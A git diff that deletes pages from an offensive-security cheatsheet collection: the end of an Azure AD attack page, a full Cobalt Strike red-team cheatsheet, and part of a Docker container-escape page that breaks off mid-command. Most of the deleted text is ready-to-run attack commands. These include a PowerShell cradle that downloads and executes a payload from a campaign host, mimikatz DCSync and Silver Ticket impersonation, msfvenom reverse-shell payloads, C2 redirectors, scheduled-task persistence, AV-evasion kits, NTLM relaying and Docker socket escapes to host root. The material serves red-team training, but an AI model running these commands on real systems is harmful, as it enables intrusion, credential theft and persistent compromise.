https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c - -Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack. - -### Azure AD Connect - Seamless Single Sign On Silver Ticket - -> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA) - -> Seamless SSO is supported by both PHS and PTA. If seamless SSO is enabled, a computer account **AZUREADSSOC** is created in the on-prem AD. - -:warning: The password of the AZUREADSSOACC account never changes. - -Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsoftazuread-sso.com/) to convert Kerberos tickets to SAML and JWT for Office 365 & Azure - -1. NTLM password hash of the AZUREADSSOACC account, e.g. `f9969e088b2c13d93833d0ce436c76dd`. - ```powershell - mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit - ``` -2. AAD logon name of the user we want to impersonate, e.g. `elrond@contoso.com`. This is typically either his userPrincipalName or mail attribute from the on-prem AD. -3. SID of the user we want to impersonate, e.g. `S-1-5-21-2121516926-2695913149-3163778339-1234`. -4. Create the Silver Ticket and inject it into Kerberos cache: - ```powershell - mimikatz.exe "kerberos::golden /user:elrond - /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 - /domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd - /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit - ``` -5. Launch Mozilla Firefox -6. Go to about:config and set the `network.negotiate-auth.trusted-uris preference` to value `https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com` -7. Navigate to any web application that is integrated with our AAD domain. Fill in the user name, while leaving the password field empty. - - -## References - -* [Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack](https://www.alteredsecurity.com/post/introduction-to-365-stealer) -* [Learn with @trouble1_raunak: Cloud Pentesting - Azure (Illicit Consent Grant Attack) !!](https://www.youtube.com/watch?v=51FSvndgddk&list=WL) -* [Pass-the-PRT attack and detection by Microsoft Defender for … - Derk van der Woude - Jun 9](https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94) -* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) -* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html) -* [Bypassing conditional access by faking device compliance - September 06, 2020 - @DrAzureAD](https://o365blog.com/post/mdm/) -* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md) -* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/) -* [An introduction to penetration testing Azure - Akimbocore](https://akimbocore.com/article/introduction-to-pentesting-azure/) -* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) -* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/) -* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) -* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/) -* [Azure AD Overview](https://www.youtube.com/watch?v=l_pnNpdxj20) -* [Windows Azure Active Directory in plain English](https://www.youtube.com/watch?v=IcSATObaQZE) -* [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f) -* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) -* [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) -* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) -* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) -* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) -* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) -* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) -* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) -* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html) -* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad) diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md deleted file mode 100644 index e84435c..0000000 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md +++ /dev/null @@ -1,491 +0,0 @@ -# Cobalt Strike - -> Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful graphical user interface that encourages collaboration and reports all activity. - - -```powershell -$ sudo apt-get update -$ sudo apt-get install openjdk-11-jdk -$ sudo apt install proxychains socat -$ sudo update-java-alternatives -s java-1.11.0-openjdk-amd64 -$ sudo ./teamserver 10.10.10.10 "password" [malleable C2 profile] -$ ./cobaltstrike -$ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))" -``` - -## Summary - -* [Infrastructure](#infrastructure) - * [Redirectors](#redirectors) - * [Domain fronting](#domain-fronting) -* [OpSec](#opsec) - * [Customer ID](#customer-id) -* [Payloads](#payloads) - * [DNS Beacon](#dns-beacon) - * [SMB Beacon](#smb-beacon) - * [Metasploit compatibility](#metasploit-compatibility) - * [Custom Payloads](#custom-payloads) -* [Malleable C2](#malleable-c2) -* [Files](#files) -* [Powershell and .NET](#powershell-and-net) - * [Powershell commabds](#powershell-commands) - * [.NET remote execution](#net-remote-execution) -* [Lateral Movement](#lateral-movement) -* [VPN & Pivots](#vpn--pivots) -* [Kits](#kits) - * [Elevate Kit](#elevate-kit) - * [Persistence Kit](#persistence-kit) - * [Resource Kit](#resource-kit) - * [Artifact Kit](#artifact-kit) - * [Mimikatz Kit](#mimikatz-kit) - * [Sleep Mask Kit](#sleep-mask-kit) - * [Thread Stack Spoofer](#thread-stack-spoofer) -* [Beacon Object Files](#beacon-object-files) -* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike) -* [References](#references) - - -## Infrastructure - -### Redirectors - -```powershell -sudo apt install socat -socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80 -``` - -### Domain Fronting - -* New Listener > HTTP Host Header -* Choose a domain in "Finance & Healthcare" sector - -## OpSec - -**Don't** -* Use default self-signed HTTPS certificate -* Use default port (50050) -* Use 0.0.0.0 DNS response -* Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D` - -**Do** -* Use a redirector (Apache, CDN, ...) -* Firewall to only accept HTTP/S from the redirectors -* Firewall 50050 and access via SSH tunnel -* Edit default HTTP 404 page and Content type: text/plain -* No staging `set hosts_stage` to `false` in Malleable C2 -* Use Malleable Profile to taylor your attack to specific actors - -### Customer ID - -> The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike. - -* The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later. -* The trial has a Customer ID value of 0. -* Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool - -## Payloads - -### DNS Beacon - -* Edit the Zone File for the domain -* Create an A record for Cobalt Strike system -* Create an NS record that points to FQDN of your Cobalt Strike system - -Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a DNS A record and point it to your Cobalt Strike team server. Use DNS NS records to delegate several domains or sub-domains to your Cobalt Strike team server's A record. - -* nslookup jibberish.beacon polling.campaigns.domain.com -* nslookup jibberish.beacon campaigns.domain.com - -Example of DNS on Digital Ocean: - -```powershell -NS example.com directs to 10.10.10.10. 86400 -NS polling.campaigns.example.com directs to campaigns.example.com. 3600 -A campaigns.example.com directs to 10.10.10.10 3600 -``` - -```powershell -systemctl disable systemd-resolved -systemctl stop systemd-resolved -rm /etc/resolv.conf -echo "nameserver 8.8.8.8" > /etc/resolv.conf -echo "nameserver 8.8.4.4" >> /etc/resolv.conf -``` - -Configuration: -1. **host**: campaigns.domain.com -2. **beacon**: polling.campaigns.domain.com -3. Interact with a beacon, and `sleep 0` - - -### SMB Beacon - -```powershell -link [host] [pipename] -connect [host] [port] -unlink [host] [PID] -jump [exec] [host] [pipe] -``` - -SMB Beacon uses Named Pipes. You might encounter these error code while running it. - -| Error Code | Meaning | Description | -|------------|----------------------|----------------------------------------------------| -| 2 | File Not Found | There is no beacon for you to link to | -| 5 | Access is denied | Invalid credentials or you don't have permission | -| 53 | Bad Netpath | You have no trust relationship with the target system. It may or may not be a beacon there. | - - -### SSH Beacon - -```powershell -# deploy a beacon -beacon> help ssh -Use: ssh [target:port] [user] [pass] -Spawn an SSH client and attempt to login to the specified target - -beacon> help ssh-key -Use: ssh [target:port] [user] [/path/to/key.pem] -Spawn an SSH client and attempt to login to the specified target - -# beacon's commands -upload Upload a file -download Download a file -socks Start SOCKS4a server to relay traffic -sudo Run a command via sudo -rportfwd Setup a reverse port forward -shell Execute a command via the shell -``` - -### Metasploit compatibility - -* Payload: windows/meterpreter/reverse_http or windows/meterpreter/reverse_https -* Set LHOST and LPORT to the beacon -* Set DisablePayloadHandler to True -* Set PrependMigrate to True -* exploit -j - -### Custom Payloads - -https://ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c - -```powershell -* Attacks > Packages > Payload Generator -* Attacks > Packages > Scripted Web Delivery (S) -$ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor -$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml -$ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml -``` - -## Malleable C2 - -List of Malleable Profiles hosted on Github -* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles -* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2 -* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles -* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint - -Example of syntax - -```powershell -set useragent "SOME AGENT"; # GOOD -set useragent 'SOME AGENT'; # BAD -prepend "This is an example;"; - -# Escape Double quotes -append "here is \"some\" stuff"; -# Escape Backslashes -append "more \\ stuff"; -# Some special characters do not need escaping -prepend "!@#$%^&*()"; -``` - -Check a profile with `./c2lint`. -* A result of 0 is returned if c2lint completes with no errors -* A result of 1 is returned if c2lint completes with only warnings -* A result of 2 is returned if c2lint completes with only errors -* A result of 3 is returned if c2lint completes with both errors and warning - -## Files - -```powershell -# List the file on the specified directory -beacon > ls - -# Change into the specified working directory -beacon > cd [directory] - -# Delete a file\folder -beacon > rm [file\folder] - -# File copy -beacon > cp [src] [dest] - -# Download a file from the path on the Beacon host -beacon > download [C:\filePath] - -# Lists downloads in progress -beacon > downloads - -# Cancel a download currently in progress -beacon > cancel [*file*] - -# Upload a file from the attacker to the current Beacon host -beacon > upload [/path/to/file] -``` - -## Powershell and .NET - -### Powershell commands - -```powershell -# Import a Powershell .ps1 script from the control server and save it in memory in Beacon -beacon > powershell-import [/path/to/script.ps1] - -# Setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned. -beacon > powershell [commandlet][arguments] - -# Launch the given function using Unmanaged Powershell, which does not start powershell.exe. The program used is set by spawnto -beacon > powerpick [commandlet] [argument] - -# Inject Unmanaged Powershell into a specific process and execute the specified command. This is useful for long-running Powershell jobs -beacon > psinject [pid][arch] [commandlet] [arguments] -``` - -### .NET remote execution - -Run a local .NET executable as a Beacon post-exploitation job. - -Require: -* Binaries compiled with the "Any CPU" configuration. - -```powershell -beacon > execute-assembly [/path/to/script.exe] [arguments] -beacon > execute-assembly /home/audit/Rubeus.exe -[*] Tasked beacon to run .NET program: Rubeus.exe -[+] host called home, sent: 318507 bytes -[+] received output: - - ______ _ - (_____ \ | | - _____) )_ _| |__ _____ _ _ ___ - | __ /| | | | _ \| ___ | | | |/___) - | | \ \| |_| | |_) ) ____| |_| |___ | - |_| |_|____/|____/|_____)____/(___/ - - v1.4.2 -``` - -## Lateral Movement - -:warning: OPSEC Advice: Use the **spawnto** command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe - -- **portscan:** Performs a portscan on a specific target. -- **runas:** A wrapper of runas.exe, using credentials you can run a command as another user. -- **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \ -:exclamation: This module needs Administrator privileges. -- **steal_token:** Steal a token from a specified process. -- **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user. -- **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \ -:exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \ -:muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network. -- **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \ -:exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target. -- **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts. - -:warning: All the commands launch powershell.exe - -```powershell -Beacon Remote Exploits -====================== -jump [module] [target] [listener] - - psexec x86 Use a service to run a Service EXE artifact - psexec64 x64 Use a service to run a Service EXE artifact - psexec_psh x86 Use a service to run a PowerShell one-liner - winrm x86 Run a PowerShell script via WinRM - winrm64 x64 Run a PowerShell script via WinRM - -Beacon Remote Execute Methods -============================= -remote-exec [module] [target] [command] - - Methods Description - ------- ----------- - psexec Remote execute via Service Control Manager - winrm Remote execute via WinRM (PowerShell) - wmi Remote execute via WMI (PowerShell) - -``` - -Opsec safe Pass-the-Hash: -1. `mimikatz sekurlsa::pth /user:xxx /domain:xxx /ntlm:xxxx /run:"powershell -w hidden"` -2. `steal_token PID` - -### Assume Control of Artifact - -* Use `link` to connect to SMB Beacon -* Use `connect` to connect to TCP Beacon - - -## VPN & Pivots - -:warning: Covert VPN doesn't work with W10, and requires Administrator access to deploy. - -> Use socks 8080 to setup a SOCKS4a proxy server on port 8080 (or any other port you choose). This will setup a SOCKS proxy server to tunnel traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it. Use sleep 0 to make Beacon check-in several times a second. - -```powershell -# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage. -beacon > socks [PORT] -beacon > socks [port] -beacon > socks [port] [socks4] -beacon > socks [port] [socks5] -beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] -beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging] - -# Proxy browser traffic through a specified Internet Explorer process. -beacon > browserpivot [pid] [x86|x64] - -# Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port. -beacon > rportfwd [bind port] [forward host] [forward port] - -# spunnel : Spawn an agent and create a reverse port forward tunnel to its controller. ~= rportfwd + shspawn. -msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin -beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin - -# spunnel_local: Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller -# then you can handle the connect back on your MSF multi handler -beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin -``` - -## Kits - -* [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/) - Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike - -### Elevate Kit - -UAC Token Duplication : Fixed in Windows 10 Red Stone 5 (October 2018) - -```powershell -beacon> runasadmin - -Beacon Command Elevators -======================== - - Exploit Description - ------- ----------- - ms14-058 TrackPopupMenu Win32k NULL Pointer Dereference (CVE-2014-4113) - ms15-051 Windows ClientCopyImage Win32k Exploit (CVE 2015-1701) - ms16-016 mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051) - svc-exe Get SYSTEM via an executable run as a service - uac-schtasks Bypass UAC with schtasks.exe (via SilentCleanup) - uac-token-duplication Bypass UAC with Token Duplication -``` - -### Persistence Kit - -* https://github.com/0xthirteen/MoveKit -* https://github.com/fireeye/SharPersist - ```powershell - # List persistences - SharPersist -t schtaskbackdoor -m list - SharPersist -t startupfolder -m list - SharPersist -t schtask -m list - - # Add a persistence - SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add - SharPersist -t schtaskbackdoor -n "Something Cool" -m remove - - SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add - SharPersist -t service -n "Some Service" -m remove - - SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add - SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly - SharPersist -t schtask -n "Some Task" -m remove - ``` - -### Resource Kit - -> The Resource Kit is Cobalt Strike's means to change the HTA, PowerShell, Python, VBA, and VBS script templates Cobalt Strike uses in its workflows - -### Artifact Kit - -> Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. The Artifact Kit build script creates a folder with template artifacts for each Artifact Kit technique. To use a technique with Cobalt Strike, go to Cobalt Strike -> Script Manager, and load the artifact.cna script from that technique's folder. - -Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 : - -- Download the artifact kit : `Go to Help -> Arsenal to download Artifact Kit (requires a licensed version of Cobalt Strike)` -- Install the dependencies : `sudo apt-get install mingw-w64` -- Edit the Artifact code - * Change pipename strings - * Change `VirtualAlloc` in `patch.c`/`patch.exe`, e.g: HeapAlloc - * Change Import -- Build the Artifact -- Cobalt Strike -> Script Manager > Load .cna - -### Mimikatz Kit - -* Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724) -* Load the mimikatz.cna aggressor script -* Use mimikatz functions as normal - -### Sleep Mask Kit - -> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping. - -Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons. - -### Thread Stack Spoofer - -> An advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory. - -Thread Stack Spoofer is now enabled by default in the Artifact Kit, it is possible to disable it via the option `artifactkit_stack_spoof` in the config file `arsenal_kit.config`. - -## Beacon Object Files - -> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs - -Example: https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h - -* Compile - ```ps1 - # To compile this with Visual Studio: - cl.exe /c /GS- hello.c /Fohello.o - - # To compile this with x86 MinGW: - i686-w64-mingw32-gcc -c hello.c -o hello.o - - # To compile this with x64 MinGW: - x86_64-w64-mingw32-gcc -c hello.c -o hello.o - ``` -* Execute: `inline-execute /path/to/hello.o` - -## NTLM Relaying via Cobalt Strike - -```powershell -beacon> socks 1080 -kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb:// -beacon> rportfwd_local 8445 445 -beacon> upload C:\Tools\PortBender\WinDivert64.sys -beacon> PortBender redirect 445 8445 -``` - -## References - -* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI) -* [Red Team Ops with Cobalt Strike (2 of 9): Infrastructure](https://www.youtube.com/watch?v=5gwEMocFkc0) -* [Red Team Ops with Cobalt Strike (3 of 9): C2](https://www.youtube.com/watch?v=Z8n9bIPAIao) -* [Red Team Ops with Cobalt Strike (4 of 9): Weaponization](https://www.youtube.com/watch?v=H0_CKdwbMRk) -* [Red Team Ops with Cobalt Strike (5 of 9): Initial Access](https://www.youtube.com/watch?v=bYt85zm4YT8) -* [Red Team Ops with Cobalt Strike (6 of 9): Post Exploitation](https://www.youtube.com/watch?v=Pb6yvcB2aYw) -* [Red Team Ops with Cobalt Strike (7 of 9): Privilege Escalation](https://www.youtube.com/watch?v=lzwwVwmG0io) -* [Red Team Ops with Cobalt Strike (8 of 9): Lateral Movement](https://www.youtube.com/watch?v=QF_6zFLmLn0) -* [Red Team Ops with Cobalt Strike (9 of 9): Pivoting](https://www.youtube.com/watch?v=sP1HgUu7duU&list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no&index=10&t=0s) -* [A Deep Dive into Cobalt Strike Malleable C2 - Joe Vest - Sep 5, 2018 ](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b) -* [Cobalt Strike. Walkthrough for Red Teamers - Neil Lines - 15 Apr 2019](https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/) -* [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/) -* [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon) -* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) -* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) -* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) -* [Cobalt Strike 4.6 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-6-user-guide.pdf) diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md deleted file mode 100644 index b836acd..0000000 --- a/Methodology and Resources/Container - Docker Pentest.md +++ /dev/null @@ -1,250 +0,0 @@ -# Container - Docker Pentest - -> Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers. - -## Summary - -- [Tools](#tools) -- [Mounted Docker Socket](#mounted-docker-socket) -- [Open Docker API Port](#open-docker-api-port) -- [Insecure Docker Registry](#insecure-docker-registry) -- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1) - - [Abusing CAP_SYS_ADMIN capability](#abusing-capsysadmin-capability) - - [Abusing coredumps and core_pattern](#abusing-coredumps-and-corepattern) -- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc) -- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file) -- [References](#references) - -## Tools - -* [Dockscan](https://github.com/kost/dockscan) : Dockscan is security vulnerability and audit scanner for Docker installations - ```powershell - dockscan unix:///var/run/docker.sock - dockscan -r html -o myreport -v tcp://example.com:5422 - ``` -* [DeepCe](https://github.com/stealthcopter/deepce) : Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE) - ```powershell - ./deepce.sh - ./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce - ./deepce.sh --no-enumeration --exploit SOCK --shadow - ./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked" - ``` - -## Mounted Docker Socket - -Prerequisite: -* Socker mounted as volume : `- "/var/run/docker.sock:/var/run/docker.sock"` - -Usually found in `/var/run/docker.sock`, for example for Portainer. - -```powershell -curl --unix-socket /var/run/docker.sock http://127.0.0.1/containers/json -curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create -curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start -``` - -Exploit using [brompwnie/ed](https://github.com/brompwnie/ed) - -```powershell -root@37bb034797d1:/tmp# ./ed_linux_amd64 -path=/var/run/ -autopwn=true -[+] Hunt dem Socks -[+] Hunting Down UNIX Domain Sockets from: /var/run/ -[*] Valid Socket: /var/run/docker.sock -[+] Attempting to autopwn -[+] Hunting Docker Socks -[+] Attempting to Autopwn: /var/run/docker.sock -[*] Getting Docker client... -[*] Successfully got Docker client... -[+] Attempting to escape to host... -[+] Attempting in TTY Mode -chroot /host && clear -echo 'You are now on the underlying host' -chroot /host && clear -echo 'You are now on the underlying host' -/ # chroot /host && clear -/ # echo 'You are now on the underlying host' -You are now on the underlying host -/ # id -uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) -``` - - -## Open Docker API Port - -Prerequisite: -* Docker runned with `-H tcp://0.0.0.0:XXXX` - -```powershell -$ nmap -sCV 10.10.10.10 -p 2376 -2376/tcp open docker Docker 19.03.5 -| docker-version: -| Version: 19.03.5 -| MinAPIVersion: 1.12 -``` - -Mount the current system inside a new "temporary" Ubuntu container, you will gain root access to the filesystem in `/mnt`. - -```powershell -$ export DOCKER_HOST=tcp://10.10.10.10:2376 -$ docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash -or -$ docker -H open.docker.socket:2375 ps -$ docker -H open.docker.socket:2375 exec -it mysql /bin/bash -or -$ curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq -$ curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}' -``` - -From there you can backdoor the filesystem by adding an ssh key in `/root/.ssh` or adding a new root user in `/etc/passwd`. - - -## Insecure Docker Registry - -Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. Then connect to Registry API endpoint: `/v2/_catalog`. - -```powershell -curl https://registry.example.com/v2//tags/list -docker pull https://registry.example.com:443/: - -# connect to the endpoint and list image blobs -curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog -curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list -curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest -# download blobs -curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz -# automated download -https://github.com/NotSoSecure/docker_fetch/ -python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local -``` - -Access a private registry and start a container with one of its image - -```powershell -docker login -u admin -p admin docker.registry.local -docker pull docker.registry.local/wordpress-image -docker run -it docker.registry.local/wordpress-image /bin/bash -``` - -Access a private registry using OAuth Token from Google - -```powershell -curl http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/email -curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token -docker login -e -u oauth2accesstoken -p "" https://gcr.io -``` - -## Exploit privileged container abusing the Linux cgroup v1 - -Prerequisite (at least one): - * `--privileged` - * `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` flags. - - -### Abusing CAP_SYS_ADMIN capability - -```powershell -docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash -c 'echo 